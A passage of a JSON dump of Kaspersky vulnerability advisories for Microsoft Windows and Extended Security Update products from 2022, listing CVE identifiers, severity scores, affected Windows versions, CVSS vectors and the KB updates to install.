\n[CVE-2022-21903](<https://vulners.com/cve/CVE-2022-21903>)5.0Critical \n[CVE-2022-21889](<https://vulners.com/cve/CVE-2022-21889>)5.0Critical \n[CVE-2022-21919](<https://vulners.com/cve/CVE-2022-21919>)5.0Critical \n[CVE-2022-21851](<https://vulners.com/cve/CVE-2022-21851>)9.3Critical \n[CVE-2022-21920](<https://vulners.com/cve/CVE-2022-21920>)5.0Critical \n[CVE-2022-21924](<https://vulners.com/cve/CVE-2022-21924>)5.0Critical \n[CVE-2022-21905](<https://vulners.com/cve/CVE-2022-21905>)5.0Critical \n[CVE-2022-21836](<https://vulners.com/cve/CVE-2022-21836>)7.2High \n[CVE-2022-21900](<https://vulners.com/cve/CVE-2022-21900>)5.0Critical \n[CVE-2022-21880](<https://vulners.com/cve/CVE-2022-21880>)7.8Critical \n[CVE-2022-21883](<https://vulners.com/cve/CVE-2022-21883>)5.0Critical \n[CVE-2022-21833](<https://vulners.com/cve/CVE-2022-21833>)7.2High \n[CVE-2022-21890](<https://vulners.com/cve/CVE-2022-21890>)5.0Critical \n[CVE-2022-21893](<https://vulners.com/cve/CVE-2022-21893>)5.0Critical \n[CVE-2022-21904](<https://vulners.com/cve/CVE-2022-21904>)5.0Critical \n[CVE-2022-21848](<https://vulners.com/cve/CVE-2022-21848>)7.1High \n[CVE-2022-21884](<https://vulners.com/cve/CVE-2022-21884>)5.0Critical \n[CVE-2022-21897](<https://vulners.com/cve/CVE-2022-21897>)5.0Critical \n[CVE-2022-21857](<https://vulners.com/cve/CVE-2022-21857>)9.0Critical \n[CVE-2022-21862](<https://vulners.com/cve/CVE-2022-21862>)6.9High \n[CVE-2022-21899](<https://vulners.com/cve/CVE-2022-21899>)5.0Critical \n[CVE-2022-21885](<https://vulners.com/cve/CVE-2022-21885>)5.0Critical \n[CVE-2022-21914](<https://vulners.com/cve/CVE-2022-21914>)5.0Critical \n[CVE-2022-21843](<https://vulners.com/cve/CVE-2022-21843>)4.3Warning \n[CVE-2022-21916](<https://vulners.com/cve/CVE-2022-21916>)5.0Critical\n\n### *KB list*:\n[5009627](<http://support.microsoft.com/kb/5009627>) \n[5009601](<http://support.microsoft.com/kb/5009601>) \n[5009621](<http://support.microsoft.com/kb/5009621>) \n[5009610](<http://support.microsoft.com/kb/5009610>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "kaspersky", "title": "KLA12423 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21862", "CVE-2022-21880", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21893", "CVE-2022-21897", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925"], "modified": "2022-01-18T00:00:00", "id": "KLA12423", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12423/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:52:38", "description": "### *Detect date*:\n01/11/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions, cause denial of service, spoof user interface.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2022 \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2022 (Server Core installation) \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2016 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2016 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 21H2 for 32-bit Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-21860](<https://nvd.nist.gov/vuln/detail/CVE-2022-21860>) \n[CVE-2022-21959](<https://nvd.nist.gov/vuln/detail/CVE-2022-21959>) \n[CVE-2022-21852](<https://nvd.nist.gov/vuln/detail/CVE-2022-21852>) \n[CVE-2022-21859](<https://nvd.nist.gov/vuln/detail/CVE-2022-21859>) \n[CVE-2022-21915](<https://nvd.nist.gov/vuln/detail/CVE-2022-21915>) \n[CVE-2022-21875](<https://nvd.nist.gov/vuln/detail/CVE-2022-21875>) \n[CVE-2022-21908](<https://nvd.nist.gov/vuln/detail/CVE-2022-21908>) \n[CVE-2021-36976](<https://nvd.nist.gov/vuln/detail/CVE-2021-36976>) \n[CVE-2022-21834](<https://nvd.nist.gov/vuln/detail/CVE-2022-21834>) \n[CVE-2022-21864](<https://nvd.nist.gov/vuln/detail/CVE-2022-21864>) \n[CVE-2022-21910](<https://nvd.nist.gov/vuln/detail/CVE-2022-21910>) \n[CVE-2022-21898](<https://nvd.nist.gov/vuln/detail/CVE-2022-21898>) \n[CVE-2022-21922](<https://nvd.nist.gov/vuln/detail/CVE-2022-21922>) \n[CVE-2022-21881](<https://nvd.nist.gov/vuln/detail/CVE-2022-21881>) \n[CVE-2022-21838](<https://nvd.nist.gov/vuln/detail/CVE-2022-21838>) \n[CVE-2022-21867](<https://nvd.nist.gov/vuln/detail/CVE-2022-21867>) \n[CVE-2022-21901](<https://nvd.nist.gov/vuln/detail/CVE-2022-21901>) \n[CVE-2022-21865](<https://nvd.nist.gov/vuln/detail/CVE-2022-21865>) \n[CVE-2022-21850](<https://nvd.nist.gov/vuln/detail/CVE-2022-21850>) \n[CVE-2022-21870](<https://nvd.nist.gov/vuln/detail/CVE-2022-21870>) \n[CVE-2022-21912](<https://nvd.nist.gov/vuln/detail/CVE-2022-21912>) \n[CVE-2022-21913](<https://nvd.nist.gov/vuln/detail/CVE-2022-21913>) \n[CVE-2022-21894](<https://nvd.nist.gov/vuln/detail/CVE-2022-21894>) \n[CVE-2022-21960](<https://nvd.nist.gov/vuln/detail/CVE-2022-21960>) \n[CVE-2022-21879](<https://nvd.nist.gov/vuln/detail/CVE-2022-21879>) \n[CVE-2022-21835](<https://nvd.nist.gov/vuln/detail/CVE-2022-21835>) \n[CVE-2022-21903](<https://nvd.nist.gov/vuln/detail/CVE-2022-21903>) \n[CVE-2022-21964](<https://nvd.nist.gov/vuln/detail/CVE-2022-21964>) \n[CVE-2022-21907](<https://nvd.nist.gov/vuln/detail/CVE-2022-21907>) \n[CVE-2022-21889](<https://nvd.nist.gov/vuln/detail/CVE-2022-21889>) \n[CVE-2022-21866](<https://nvd.nist.gov/vuln/detail/CVE-2022-21866>) \n[CVE-2021-22947](<https://nvd.nist.gov/vuln/detail/CVE-2021-22947>) \n[CVE-2022-21919](<https://nvd.nist.gov/vuln/detail/CVE-2022-21919>) \n[CVE-2022-21851](<https://nvd.nist.gov/vuln/detail/CVE-2022-21851>) \n[CVE-2022-21920](<https://nvd.nist.gov/vuln/detail/CVE-2022-21920>) \n[CVE-2022-21888](<https://nvd.nist.gov/vuln/detail/CVE-2022-21888>) \n[CVE-2022-21868](<https://nvd.nist.gov/vuln/detail/CVE-2022-21868>) \n[CVE-2022-21963](<https://nvd.nist.gov/vuln/detail/CVE-2022-21963>) \n[CVE-2022-21958](<https://nvd.nist.gov/vuln/detail/CVE-2022-21958>) \n[CVE-2022-21928](<https://nvd.nist.gov/vuln/detail/CVE-2022-21928>) \n[CVE-2022-21924](<https://nvd.nist.gov/vuln/detail/CVE-2022-21924>) \n[CVE-2022-21905](<https://nvd.nist.gov/vuln/detail/CVE-2022-21905>) \n[CVE-2022-21836](<https://nvd.nist.gov/vuln/detail/CVE-2022-21836>) \n[CVE-2022-21839](<https://nvd.nist.gov/vuln/detail/CVE-2022-21839>) \n[CVE-2022-21918](<https://nvd.nist.gov/vuln/detail/CVE-2022-21918>) \n[CVE-2022-21900](<https://nvd.nist.gov/vuln/detail/CVE-2022-21900>) \n[CVE-2022-21880](<https://nvd.nist.gov/vuln/detail/CVE-2022-21880>) \n[CVE-2022-21883](<https://nvd.nist.gov/vuln/detail/CVE-2022-21883>) \n[CVE-2022-21882](<https://nvd.nist.gov/vuln/detail/CVE-2022-21882>) \n[CVE-2022-21902](<https://nvd.nist.gov/vuln/detail/CVE-2022-21902>) \n[CVE-2022-21833](<https://nvd.nist.gov/vuln/detail/CVE-2022-21833>) \n[CVE-2022-21877](<https://nvd.nist.gov/vuln/detail/CVE-2022-21877>) \n[CVE-2022-21871](<https://nvd.nist.gov/vuln/detail/CVE-2022-21871>) \n[CVE-2022-21874](<https://nvd.nist.gov/vuln/detail/CVE-2022-21874>) \n[CVE-2022-21890](<https://nvd.nist.gov/vuln/detail/CVE-2022-21890>) \n[CVE-2022-21917](<https://nvd.nist.gov/vuln/detail/CVE-2022-21917>) \n[CVE-2022-21893](<https://nvd.nist.gov/vuln/detail/CVE-2022-21893>) \n[CVE-2022-21904](<https://nvd.nist.gov/vuln/detail/CVE-2022-21904>) \n[CVE-2022-21876](<https://nvd.nist.gov/vuln/detail/CVE-2022-21876>) \n[CVE-2022-21848](<https://nvd.nist.gov/vuln/detail/CVE-2022-21848>) \n[CVE-2022-21847](<https://nvd.nist.gov/vuln/detail/CVE-2022-21847>) \n[CVE-2022-21896](<https://nvd.nist.gov/vuln/detail/CVE-2022-21896>) \n[CVE-2022-21961](<https://nvd.nist.gov/vuln/detail/CVE-2022-21961>) \n[CVE-2022-21887](<https://nvd.nist.gov/vuln/detail/CVE-2022-21887>) \n[CVE-2022-21884](<https://nvd.nist.gov/vuln/detail/CVE-2022-21884>) \n[CVE-2022-21897](<https://nvd.nist.gov/vuln/detail/CVE-2022-21897>) \n[CVE-2022-21857](<https://nvd.nist.gov/vuln/detail/CVE-2022-21857>) \n[CVE-2022-21862](<https://nvd.nist.gov/vuln/detail/CVE-2022-21862>) \n[CVE-2022-21878](<https://nvd.nist.gov/vuln/detail/CVE-2022-21878>) \n[CVE-2022-21858](<https://nvd.nist.gov/vuln/detail/CVE-2022-21858>) \n[CVE-2022-21849](<https://nvd.nist.gov/vuln/detail/CVE-2022-21849>) \n[CVE-2022-21921](<https://nvd.nist.gov/vuln/detail/CVE-2022-21921>) \n[CVE-2022-21906](<https://nvd.nist.gov/vuln/detail/CVE-2022-21906>) \n[CVE-2022-21873](<https://nvd.nist.gov/vuln/detail/CVE-2022-21873>) \n[CVE-2022-21899](<https://nvd.nist.gov/vuln/detail/CVE-2022-21899>) \n[CVE-2022-21885](<https://nvd.nist.gov/vuln/detail/CVE-2022-21885>) \n[CVE-2022-21895](<https://nvd.nist.gov/vuln/detail/CVE-2022-21895>) \n[CVE-2022-21914](<https://nvd.nist.gov/vuln/detail/CVE-2022-21914>) \n[CVE-2022-21861](<https://nvd.nist.gov/vuln/detail/CVE-2022-21861>) \n[CVE-2022-21872](<https://nvd.nist.gov/vuln/detail/CVE-2022-21872>) \n[CVE-2022-21892](<https://nvd.nist.gov/vuln/detail/CVE-2022-21892>) \n[CVE-2022-21869](<https://nvd.nist.gov/vuln/detail/CVE-2022-21869>) \n[CVE-2022-21843](<https://nvd.nist.gov/vuln/detail/CVE-2022-21843>) \n[CVE-2022-21863](<https://nvd.nist.gov/vuln/detail/CVE-2022-21863>) \n[CVE-2022-21916](<https://nvd.nist.gov/vuln/detail/CVE-2022-21916>) \n[CVE-2022-21962](<https://nvd.nist.gov/vuln/detail/CVE-2022-21962>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2022-21860](<https://vulners.com/cve/CVE-2022-21860>)4.4Warning \n[CVE-2022-21959](<https://vulners.com/cve/CVE-2022-21959>)7.2High \n[CVE-2022-21852](<https://vulners.com/cve/CVE-2022-21852>)7.2High \n[CVE-2022-21859](<https://vulners.com/cve/CVE-2022-21859>)6.9High \n[CVE-2022-21915](<https://vulners.com/cve/CVE-2022-21915>)4.0Warning \n[CVE-2022-21875](<https://vulners.com/cve/CVE-2022-21875>)7.2High \n[CVE-2022-21908](<https://vulners.com/cve/CVE-2022-21908>)7.2High \n[CVE-2021-36976](<https://vulners.com/cve/CVE-2021-36976>)4.3Warning \n[CVE-2022-21834](<https://vulners.com/cve/CVE-2022-21834>)7.2High \n[CVE-2022-21864](<https://vulners.com/cve/CVE-2022-21864>)4.4Warning \n[CVE-2022-21910](<https://vulners.com/cve/CVE-2022-21910>)4.6Warning \n[CVE-2022-21922](<https://vulners.com/cve/CVE-2022-21922>)9.0Critical \n[CVE-2022-21881](<https://vulners.com/cve/CVE-2022-21881>)7.2High \n[CVE-2022-21838](<https://vulners.com/cve/CVE-2022-21838>)7.2High \n[CVE-2022-21867](<https://vulners.com/cve/CVE-2022-21867>)6.9High \n[CVE-2022-21901](<https://vulners.com/cve/CVE-2022-21901>)7.7Critical \n[CVE-2022-21865](<https://vulners.com/cve/CVE-2022-21865>)4.4Warning \n[CVE-2022-21850](<https://vulners.com/cve/CVE-2022-21850>)9.3Critical \n[CVE-2022-21870](<https://vulners.com/cve/CVE-2022-21870>)7.2High \n[CVE-2022-21912](<https://vulners.com/cve/CVE-2022-21912>)7.2High \n[CVE-2022-21913](<https://vulners.com/cve/CVE-2022-21913>)5.0Critical \n[CVE-2022-21894](<https://vulners.com/cve/CVE-2022-21894>)4.9Warning \n[CVE-2022-21960](<https://vulners.com/cve/CVE-2022-21960>)7.2High \n[CVE-2022-21879](<https://vulners.com/cve/CVE-2022-21879>)7.2High \n[CVE-2022-21835](<https://vulners.com/cve/CVE-2022-21835>)7.2High \n[CVE-2022-21903](<https://vulners.com/cve/CVE-2022-21903>)7.2High \n[CVE-2022-21964](<https://vulners.com/cve/CVE-2022-21964>)4.9Warning \n[CVE-2022-21889](<https://vulners.com/cve/CVE-2022-21889>)4.3Warning \n[CVE-2022-21866](<https://vulners.com/cve/CVE-2022-21866>)4.4Warning \n[CVE-2021-22947](<https://vulners.com/cve/CVE-2021-22947>)4.3Warning \n[CVE-2022-21919](<https://vulners.com/cve/CVE-2022-21919>)6.9High \n[CVE-2022-21851](<https://vulners.com/cve/CVE-2022-21851>)9.3Critical \n[CVE-2022-21920](<https://vulners.com/cve/CVE-2022-21920>)9.0Critical \n[CVE-2022-21888](<https://vulners.com/cve/CVE-2022-21888>)9.3Critical \n[CVE-2022-21868](<https://vulners.com/cve/CVE-2022-21868>)6.9High \n[CVE-2022-21963](<https://vulners.com/cve/CVE-2022-21963>)7.2High \n[CVE-2022-21958](<https://vulners.com/cve/CVE-2022-21958>)7.2High \n[CVE-2022-21928](<https://vulners.com/cve/CVE-2022-21928>)6.9High \n[CVE-2022-21924](<https://vulners.com/cve/CVE-2022-21924>)5.4High \n[CVE-2022-21905](<https://vulners.com/cve/CVE-2022-21905>)4.9Warning \n[CVE-2022-21836](<https://vulners.com/cve/CVE-2022-21836>)7.2High \n[CVE-2022-21839](<https://vulners.com/cve/CVE-2022-21839>)2.1Warning \n[CVE-2022-21918](<https://vulners.com/cve/CVE-2022-21918>)4.9Warning \n[CVE-2022-21900](<https://vulners.com/cve/CVE-2022-21900>)3.8Warning \n[CVE-2022-21880](<https://vulners.com/cve/CVE-2022-21880>)7.8Critical \n[CVE-2022-21883](<https://vulners.com/cve/CVE-2022-21883>)7.1High \n[CVE-2022-21882](<https://vulners.com/cve/CVE-2022-21882>)7.2High \n[CVE-2022-21902](<https://vulners.com/cve/CVE-2022-21902>)7.2High \n[CVE-2022-21833](<https://vulners.com/cve/CVE-2022-21833>)7.2High \n[CVE-2022-21877](<https://vulners.com/cve/CVE-2022-21877>)4.9Warning \n[CVE-2022-21871](<https://vulners.com/cve/CVE-2022-21871>)7.2High \n[CVE-2022-21890](<https://vulners.com/cve/CVE-2022-21890>)4.3Warning \n[CVE-2022-21917](<https://vulners.com/cve/CVE-2022-21917>)9.3Critical \n[CVE-2022-21893](<https://vulners.com/cve/CVE-2022-21893>)8.5Critical \n[CVE-2022-21904](<https://vulners.com/cve/CVE-2022-21904>)5.0Critical \n[CVE-2022-21876](<https://vulners.com/cve/CVE-2022-21876>)4.9Warning \n[CVE-2022-21848](<https://vulners.com/cve/CVE-2022-21848>)7.1High \n[CVE-2022-21847](<https://vulners.com/cve/CVE-2022-21847>)4.9Warning \n[CVE-2022-21896](<https://vulners.com/cve/CVE-2022-21896>)6.9High \n[CVE-2022-21961](<https://vulners.com/cve/CVE-2022-21961>)7.2High \n[CVE-2022-21887](<https://vulners.com/cve/CVE-2022-21887>)7.2High \n[CVE-2022-21884](<https://vulners.com/cve/CVE-2022-21884>)7.2High \n[CVE-2022-21897](<https://vulners.com/cve/CVE-2022-21897>)7.2High \n[CVE-2022-21857](<https://vulners.com/cve/CVE-2022-21857>)9.0Critical \n[CVE-2022-21862](<https://vulners.com/cve/CVE-2022-21862>)6.9High \n[CVE-2022-21878](<https://vulners.com/cve/CVE-2022-21878>)9.3Critical \n[CVE-2022-21858](<https://vulners.com/cve/CVE-2022-21858>)7.2High \n[CVE-2022-21849](<https://vulners.com/cve/CVE-2022-21849>)9.3Critical \n[CVE-2022-21921](<https://vulners.com/cve/CVE-2022-21921>)4.9Warning \n[CVE-2022-21906](<https://vulners.com/cve/CVE-2022-21906>)2.1Warning \n[CVE-2022-21873](<https://vulners.com/cve/CVE-2022-21873>)7.2High \n[CVE-2022-21899](<https://vulners.com/cve/CVE-2022-21899>)4.9Warning \n[CVE-2022-21885](<https://vulners.com/cve/CVE-2022-21885>)7.2High \n[CVE-2022-21895](<https://vulners.com/cve/CVE-2022-21895>)7.2High \n[CVE-2022-21914](<https://vulners.com/cve/CVE-2022-21914>)7.2High \n[CVE-2022-21861](<https://vulners.com/cve/CVE-2022-21861>)7.2High \n[CVE-2022-21872](<https://vulners.com/cve/CVE-2022-21872>)7.2High \n[CVE-2022-21892](<https://vulners.com/cve/CVE-2022-21892>)7.2High \n[CVE-2022-21869](<https://vulners.com/cve/CVE-2022-21869>)7.2High \n[CVE-2022-21843](<https://vulners.com/cve/CVE-2022-21843>)4.3Warning \n[CVE-2022-21863](<https://vulners.com/cve/CVE-2022-21863>)6.9High \n[CVE-2022-21916](<https://vulners.com/cve/CVE-2022-21916>)7.2High \n[CVE-2022-21962](<https://vulners.com/cve/CVE-2022-21962>)7.2High\n\n### *KB list*:\n[5009585](<http://support.microsoft.com/kb/5009585>) \n[5009546](<http://support.microsoft.com/kb/5009546>) \n[5009557](<http://support.microsoft.com/kb/5009557>) \n[5009586](<http://support.microsoft.com/kb/5009586>) \n[5009543](<http://support.microsoft.com/kb/5009543>) \n[5009619](<http://support.microsoft.com/kb/5009619>) \n[5009555](<http://support.microsoft.com/kb/5009555>) \n[5009595](<http://support.microsoft.com/kb/5009595>) \n[5009566](<http://support.microsoft.com/kb/5009566>) \n[5009545](<http://support.microsoft.com/kb/5009545>) \n[5009624](<http://support.microsoft.com/kb/5009624>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "kaspersky", "title": "KLA12422 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21839", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21917", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963", "CVE-2022-21964"], "modified": "2023-04-21T00:00:00", "id": "KLA12422", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12422/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:50:20", "description": "### *Detect date*:\n04/12/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, obtain sensitive information, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-26917](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26917>) \n[CVE-2022-26803](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26803>) \n[CVE-2022-26788](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26788>) \n[CVE-2022-24485](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24485>) \n[CVE-2022-26822](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26822>) \n[CVE-2022-26802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26802>) \n[CVE-2022-24498](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24498>) \n[CVE-2022-24536](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24536>) \n[CVE-2022-26813](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26813>) \n[CVE-2022-24533](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24533>) \n[CVE-2022-26903](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26903>) \n[CVE-2022-26801](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26801>) \n[CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>) \n[CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>) \n[CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>) \n[CVE-2022-26796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26796>) \n[CVE-2022-26916](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26916>) \n[CVE-2022-26812](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26812>) \n[CVE-2022-26821](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26821>) \n[CVE-2022-21983](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21983>) \n[CVE-2022-26915](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26915>) \n[CVE-2022-26829](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26829>) \n[CVE-2022-24534](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24534>) \n[CVE-2022-24499](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24499>) \n[CVE-2022-26831](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26831>) \n[CVE-2022-24542](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24542>) \n[CVE-2022-24528](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24528>) \n[CVE-2022-26810](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26810>) \n[CVE-2022-26792](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26792>) \n[CVE-2022-26918](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26918>) \n[CVE-2022-26815](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26815>) \n[CVE-2022-24494](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24494>) \n[CVE-2022-26904](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904>) \n[CVE-2022-26819](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26819>) \n[CVE-2022-24492](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24492>) 